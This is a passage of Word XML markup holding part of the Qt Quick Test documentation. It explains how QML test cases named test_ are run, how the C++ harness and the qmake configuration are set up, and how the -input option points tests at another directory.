          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        compare</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</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w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"2 + 2 = 5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Functions whose names start with</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test_</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are treated as test cases to be executed</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the documentation for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1934" w:history="1">
        <w:r w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TestCase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1935" w:history="1">
        <w:r w:rsidRPr="00546121">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SignalSpy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types for more information on writing test cases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1571" w:name="running-tests"/>
      <w:bookmarkStart w:id="1572" w:name="_Toc483000871"/>
      <w:bookmarkStart w:id="1573" w:name="_Toc483003864"/>
      <w:bookmarkStart w:id="1574" w:name="_Toc483604216"/>
      <w:bookmarkStart w:id="1575" w:name="_Toc483605436"/>
      <w:bookmarkEnd w:id="1571"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Running Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1572"/>
      <w:bookmarkEnd w:id="1573"/>
      <w:bookmarkEnd w:id="1574"/>
      <w:bookmarkEnd w:id="1575"/>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>est cases are launched by a C++ harness that consists of the following code</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;QtQuickTest/quicktest.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUICK_TEST_MAIN</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example</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Where "example" is the identifier to use to uniquely identify this set of tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. You should add</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CONFIG += qmltestcase</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. for example:</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TEMPLATE </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app</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET </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tst_example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">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546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIG </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warn_on qmltestcase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SOURCES </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tst_example</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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The test harness scans the specified source directory recursively for "tst_*.qml" files. If</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUICK_TEST_SOURCE_DIR</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is not defined, then the current directory will be scanned when the harness is run. Other *.qml files may appear for auxillary QML components that are used by the test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-input</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command-line option can be set at runtime to run test cases from a different directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This may be needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run tests on a target device where the compiled-in directory name refers to a host. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tst_example </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input </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mnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SDCard</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qmltests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00546121" w:rsidRPr="00546121" w:rsidRDefault="00546121" w:rsidP="00546121">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is also possible to run a single file using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00546121">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
